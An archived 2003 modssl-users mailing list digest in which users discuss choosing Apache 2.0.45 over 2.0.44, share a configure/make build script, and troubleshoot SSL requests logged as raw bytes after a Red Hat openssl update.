Delivered-To: modssl-users@modssl.org
Received: from deepthought.cs.virginia.edu (deepthought.cs.Virginia.EDU [128.143.69.223])
	by master.modssl.org (Postfix) with ESMTP id 24CBF2AA024
	for ; Tue,  8 Apr 2003 03:23:17 +0200 (CEST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h381L2A1021592;
	Mon, 7 Apr 2003 21:21:02 -0400
Date: Mon, 7 Apr 2003 21:21:02 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: modssl-users@modssl.org
Cc: kulkarni veena 
Subject: Re: which version of modssl to be used with apache2.0.44 for solaris
 os.
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 7 Apr 2003, R. DuFresne wrote:

> This 2.0.X version of apache has modssl code built in, read the docs and
> the apache home pages.  Also, you might well with to grab 2.0.45 until
> 2.0.46 is released, which I suspect will not be that far out into the
> future....

Definitely use 2.0.45 and not 2.0.44.  And you're right, 2.0.46 isn't that
far off, but 2.0.45 is a must for now.

--Cliff

-----------------------------------------------------------------
   Cliff Woolley
   jwoolley@apache.org
   Apache HTTP Server Project

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 10:21:58 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 180592AA033; Tue,  8 Apr 2003 10:21:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bgeorges.spinweb.net (bgeorges.spinweb.net [161.58.244.134])
	by master.modssl.org (Postfix) with ESMTP id 0B6D22AA01F
	for ; Tue,  8 Apr 2003 10:21:56 +0200 (CEST)
Received: from xbridge.com (xbridgelimited-2.dsl.easynet.co.uk [212.135.187.146]) by bgeorges.spinweb.net (8.12.6p2) id h388LrZV098390; Tue, 8 Apr 2003 02:21:54 -0600 (MDT)
Message-ID: <3E928691.50705@xbridge.com>
Date: Tue, 08 Apr 2003 08:21:37 +0000
From: Bruno Georges 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020529
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: which version of modssl to be used with apache2.0.44 for solaris
 os.
References: <20030407231523.10333.qmail@web41507.mail.yahoo.com>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Bruno Georges 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Veena

Here is a script you can run to build apache with ssl
It assumes you already have openssl0.9.7a build with shared options
If you choose to build openssl as static, make sure you have mod_ssl 
static too.

echo "script for automatic building of apache 2  with-ssl "
./configure --prefix=/opt/apache_2.0.45 --enable-ssl=shared 
--with-ssl=/opt/openssl --enable-status=static --enable-rewrite=sha
red  --disable-auth_digest --with-mpm=worker --enable-mods-shared=most > 
build.log
echo "apache 2 has been configured... now to make"
make
echo "apache 2 compiled now to make install"
make install
echo "apache 2 installation finished "

Hope this helps.

Bruno.


kulkarni veena wrote:

>Hi,
> I did not find any modssl version for apache 2.0.44
>on the modssl website can i use the most recent modssl
>build for apache 2.0.44?
>
>Thnaks in advance
>
>-veena
>
>
>__________________________________________________
>Do you Yahoo!?
>Yahoo! Tax Center - File online, calculators, forms, and more
>http://tax.yahoo.com
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>  
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 16:05:46 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 39DBF2AA033; Tue,  8 Apr 2003 16:05:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id 3497C2AA01F
	for ; Tue,  8 Apr 2003 16:05:45 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38E5iTG008410
	for ; Tue, 8 Apr 2003 10:05:44 -0400
Message-Id: <200304081405.h38E5iTG008410@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
X-Original-To: "modssl-users@modssl.org" 
Date: Mon, 07 Apr 2003 17:43:55 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: SSL connections stopped working :(
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

   Some time last week, we lost our ability to do SSL.  As near as I can 
figure, it was around the time I updated my openssl.  We're using RH 8.0 
and their openssl-0.9.6b-33 (says it's 6h).  

   I retrieved 2.8.14 from the site today (was using .12 and hoped this 
would fix it).  

   I've tried to build this thing on multiple machines, etc.  It's not 
helping.

   Basically any ssl connection gets logged by apache as "\x80F\x01\X03" 
intead of teh usual "GET / HTTP/1.1".

   None of the apache config files changed and I haven't done anything to 
the build part of my RPM specs.

   I tried reverting to an older openssl, an older glibc, etc.  None of 
it is working :(

   If anyone has a pointer to what I might look into, it would be most 
appreciated!

   Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 16:16:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 87BDA2AA033; Tue,  8 Apr 2003 16:16:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 44D942AA01F
	for ; Tue,  8 Apr 2003 16:16:34 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h38EGEu31944
	for ; Tue, 8 Apr 2003 15:16:19 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <22VV894L>; Tue, 8 Apr 2003 15:16:09 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F28DB@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL connections stopped working :(
Date: Tue, 8 Apr 2003 15:16:08 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There's a note in the openssl FAQ that points out that although versions of
Red Hat from 7.0 to 8.0 say openssl-0.9.6b, provided you have the latest
update installed then you have all the patches "backported" (ie it says "b"
but has all the security patches up to "h"). The most up to date version is
currently openssl-0.9.6b-33.

The simplest way out is to do

rpm -e openssl --nodeps
rpm -ivh openssl-0.9.6b-33.i386.rpm (or ...i686.rpm depending on your
architecture).

To check it has reinstalled properly do
rpm -V openssl

This should return no errors.

Finally restart the web server with "service httpd restart".

There are lots of things that break if you mess with openssl on Red Hat
boxes > version 6.2. However, provided you are careful there's nothing to
stop you trying out version 0.9.7.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Taking the path of least resistance is what makes rivers and Men crooked.




> -----Original Message-----
> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> Sent: 07 April 2003 22:44
> To: modssl-users@modssl.org
> Subject: SSL connections stopped working :(
> 
> 
> Hello,
> 
>    Some time last week, we lost our ability to do SSL.  As 
> near as I can 
> figure, it was around the time I updated my openssl.  We're 
> using RH 8.0 
> and their openssl-0.9.6b-33 (says it's 6h).  
> 
>    I retrieved 2.8.14 from the site today (was using .12 and 
> hoped this 
> would fix it).  
> 
>    I've tried to build this thing on multiple machines, etc.  
> It's not 
> helping.
> 
>    Basically any ssl connection gets logged by apache as 
> "\x80F\x01\X03" 
> intead of teh usual "GET / HTTP/1.1".
> 
>    None of the apache config files changed and I haven't done 
> anything to 
> the build part of my RPM specs.
> 
>    I tried reverting to an older openssl, an older glibc, 
> etc.  None of 
> it is working :(
> 
>    If anyone has a pointer to what I might look into, it 
> would be most 
> appreciated!
> 
>    Michael
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 16:18:23 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4B81D2AA039; Tue,  8 Apr 2003 16:18:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5C2242AA01F
	for ; Tue,  8 Apr 2003 16:18:22 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h38EHpu32085
	for ; Tue, 8 Apr 2003 15:18:11 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <22VV89VL>; Tue, 8 Apr 2003 15:17:46 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F28DC@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL connections stopped working :(
Date: Tue, 8 Apr 2003 15:17:43 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

You didn't say whether you are using Red Hat's supplied httpd RPM. If you
are, that is Apache 2.0, which may also have conflicts (there's nothing to
stop you removing it and their version of mod_ssl).

rpm -q httpd will tell you if you are.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Taking the path of least resistance is what makes rivers and Men crooked.


> -----Original Message-----
> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> Sent: 07 April 2003 22:44
> To: modssl-users@modssl.org
> Subject: SSL connections stopped working :(
> 
> 
> Hello,
> 
>    Some time last week, we lost our ability to do SSL.  As 
> near as I can 
> figure, it was around the time I updated my openssl.  We're 
> using RH 8.0 
> and their openssl-0.9.6b-33 (says it's 6h).  
> 
>    I retrieved 2.8.14 from the site today (was using .12 and 
> hoped this 
> would fix it).  
> 
>    I've tried to build this thing on multiple machines, etc.  
> It's not 
> helping.
> 
>    Basically any ssl connection gets logged by apache as 
> "\x80F\x01\X03" 
> intead of teh usual "GET / HTTP/1.1".
> 
>    None of the apache config files changed and I haven't done 
> anything to 
> the build part of my RPM specs.
> 
>    I tried reverting to an older openssl, an older glibc, 
> etc.  None of 
> it is working :(
> 
>    If anyone has a pointer to what I might look into, it 
> would be most 
> appreciated!
> 
>    Michael
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 16:48:57 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01C9B2AA033; Tue,  8 Apr 2003 16:48:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id 0CD7C2AA01F
	for ; Tue,  8 Apr 2003 16:48:55 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38EmsTG018788
	for ; Tue, 8 Apr 2003 10:48:54 -0400
Message-Id: <200304081448.h38EmsTG018788@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
Date: Tue, 08 Apr 2003 10:48:51 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F28DC@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: SSL connections stopped working :(
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 8 Apr 2003 15:17:43 +0100, John.Airey@rnib.org.uk wrote:

>You didn't say whether you are using Red Hat's supplied httpd RPM. If you
>are, that is Apache 2.0, which may also have conflicts (there's nothing to
>stop you removing it and their version of mod_ssl).
>
>rpm -q httpd will tell you if you are.

John,

   Let me clarify.  I'm using:

      apache  1.3.27    built from RH 7.3 spec non-compiler with changes
      mod_ssl 2.8.14    built from RH 7.3 spec non-compiler with changes
                        also tried 2.8.12
      openssl 0.9.6b-33 as provided by RH.  It's sometime around the
                        upgrade here that things went kablooey.  Was
                        using -31 and -29.  Tried all revs back to -18
                        without success.

   I built the first two using gcc 3.2-7, glibc-2.3.2-4.80.4.  

>The simplest way out is to do
>
>rpm -e openssl --nodeps
>rpm -ivh openssl-0.9.6b-33.i386.rpm (or ...i686.rpm depending on your
>architecture).
>
>To check it has reinstalled properly do
>rpm -V openssl
>
>This should return no errors.
>
>Finally restart the web server with "service httpd restart".

I've backed things out several times, including all of ssl, apache, it's
friends, etc.  Going back to ground 0 hasn't helped :(

There are 5 systems with the same RPMs installed, all produce the same 
strange request.

   Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 17:05:35 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C6C1C2AA033; Tue,  8 Apr 2003 17:05:35 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 6A85F2AA01F
	for ; Tue,  8 Apr 2003 17:05:32 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h38F51u02878
	for ; Tue, 8 Apr 2003 16:05:21 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <22VV803P>; Tue, 8 Apr 2003 16:04:56 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F28DD@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL connections stopped working :(
Date: Tue, 8 Apr 2003 16:04:55 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> -----Original Message-----
> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> Sent: 08 April 2003 15:49
> To: modssl-users@modssl.org
> Subject: RE: SSL connections stopped working :(
> 
> John,
> 
>    Let me clarify.  I'm using:
> 
>       apache  1.3.27    built from RH 7.3 spec non-compiler 
> with changes
>       mod_ssl 2.8.14    built from RH 7.3 spec non-compiler 
> with changes
>                         also tried 2.8.12
>       openssl 0.9.6b-33 as provided by RH.  It's sometime around the
>                         upgrade here that things went kablooey.  Was
>                         using -31 and -29.  Tried all revs back to -18
>                         without success.
> 
>    I built the first two using gcc 3.2-7, glibc-2.3.2-4.80.4.  
> 
Speaking personally I avoid compiling programs whenever I can. A few years
ago I had no choice but to compile Apache, but now I stick to the Red Hat
packages (one of our systems needs a one line patch, but even then that is
built into a new RPM package). There are so many kludges within Red Hat's
version of openssl I wouldn't try to build one (they remove patent
restricted code, so what you build will break sendmail, openssh and nearly
all your email programs). The sonames don't match up to what openssl creates
either.

That's why I'd say you are best off going back to the openssl RPM version
that Red Hat supply. In addition, you might want to check that you have the
openssl-devel package installed (as you can use that to build mod_ssl and
apache against).

I'll probably get flamed now...

John

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 17:15:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8D0A62AA033; Tue,  8 Apr 2003 17:15:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id 4D3FA2AA01F
	for ; Tue,  8 Apr 2003 17:15:24 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38FFLTG031366
	for ; Tue, 8 Apr 2003 11:15:21 -0400
Message-Id: <200304081515.h38FFLTG031366@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
Date: Tue, 08 Apr 2003 11:15:18 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F28DD@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: SSL connections stopped working :(
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

John,

   I'm sorry, I must not be clear on this.  I am using RH's openssl
package, as provided.  I'm only compiling apache and mod_ssl.

   Michael

On Tue, 8 Apr 2003 16:04:55 +0100, John.Airey@rnib.org.uk wrote:

>> -----Original Message-----
>> From: Michael McLagan [mailto:mmclagan@invlogic.com]
>> Sent: 08 April 2003 15:49
>> To: modssl-users@modssl.org
>> Subject: RE: SSL connections stopped working :(
>> 
>> John,
>> 
>>    Let me clarify.  I'm using:
>> 
>>       apache  1.3.27    built from RH 7.3 spec non-compiler 
>> with changes
>>       mod_ssl 2.8.14    built from RH 7.3 spec non-compiler 
>> with changes
>>                         also tried 2.8.12
>>       openssl 0.9.6b-33 as provided by RH.  It's sometime around the
>>                         upgrade here that things went kablooey.  Was
>>                         using -31 and -29.  Tried all revs back to -18
>>                         without success.
>> 
>>    I built the first two using gcc 3.2-7, glibc-2.3.2-4.80.4.  
>> 
>Speaking personally I avoid compiling programs whenever I can. A few years
>ago I had no choice but to compile Apache, but now I stick to the Red Hat
>packages (one of our systems needs a one line patch, but even then that is
>built into a new RPM package). There are so many kludges within Red Hat's
>version of openssl I wouldn't try to build one (they remove patent
>restricted code, so what you build will break sendmail, openssh and nearly
>all your email programs). The sonames don't match up to what openssl creates
>either.
>
>That's why I'd say you are best off going back to the openssl RPM version
>that Red Hat supply. In addition, you might want to check that you have the
>openssl-devel package installed (as you can use that to build mod_ssl and
>apache against).
>
>I'll probably get flamed now...
>
>John


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 17:22:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 68FB92AA033; Tue,  8 Apr 2003 17:22:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 213BB2AA01F
	for ; Tue,  8 Apr 2003 17:22:07 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h38FLpu04532
	for ; Tue, 8 Apr 2003 16:21:56 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <22VV8060>; Tue, 8 Apr 2003 16:21:46 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F28DF@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL connections stopped working :(
Date: Tue, 8 Apr 2003 16:21:45 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thanks for the clarification. I understand where you are at now (though not
sadly why you are getting such an odd message as \x80F\x01\X03 in your logs
rather than GET / HTTP/1.1).

John

> -----Original Message-----
> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> Sent: 08 April 2003 16:15
> To: modssl-users@modssl.org
> Subject: RE: SSL connections stopped working :(
> 
> 
> John,
> 
>    I'm sorry, I must not be clear on this.  I am using RH's openssl
> package, as provided.  I'm only compiling apache and mod_ssl.
> 
>    Michael
> 
> On Tue, 8 Apr 2003 16:04:55 +0100, John.Airey@rnib.org.uk wrote:
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 17:36:42 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9B9AA2AA033; Tue,  8 Apr 2003 17:36:42 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id 5188E2AA01F
	for ; Tue,  8 Apr 2003 17:36:41 +0200 (CEST)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h38FaAu05684
	for ; Tue, 8 Apr 2003 16:36:30 +0100
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id <22VV9AFM>; Tue, 8 Apr 2003 16:36:05 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F28E1@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: SSL connections stopped working :(
Date: Tue, 8 Apr 2003 16:36:02 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

When you say that the system says you have 6h, where is that coming from?
I've just checked on a test Red Hat 8.0 server I have here, and I get the
following:

[jairey@ginger jairey]$ openssl
OpenSSL> version
OpenSSL 0.9.6b [engine] 9 Jul 2001
OpenSSL> exit

Thanks.

John

> -----Original Message-----
> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> Sent: 08 April 2003 16:15
> To: modssl-users@modssl.org
> Subject: RE: SSL connections stopped working :(
> 
> 
> John,
> 
>    I'm sorry, I must not be clear on this.  I am using RH's openssl
> package, as provided.  I'm only compiling apache and mod_ssl.
> 
>    Michael
> 
> On Tue, 8 Apr 2003 16:04:55 +0100, John.Airey@rnib.org.uk wrote:
> 
> >> -----Original Message-----
> >> From: Michael McLagan [mailto:mmclagan@invlogic.com]
> >> Sent: 08 April 2003 15:49
> >> To: modssl-users@modssl.org
> >> Subject: RE: SSL connections stopped working :(
> >> 
> >> John,
> >> 
> >>    Let me clarify.  I'm using:
> >> 
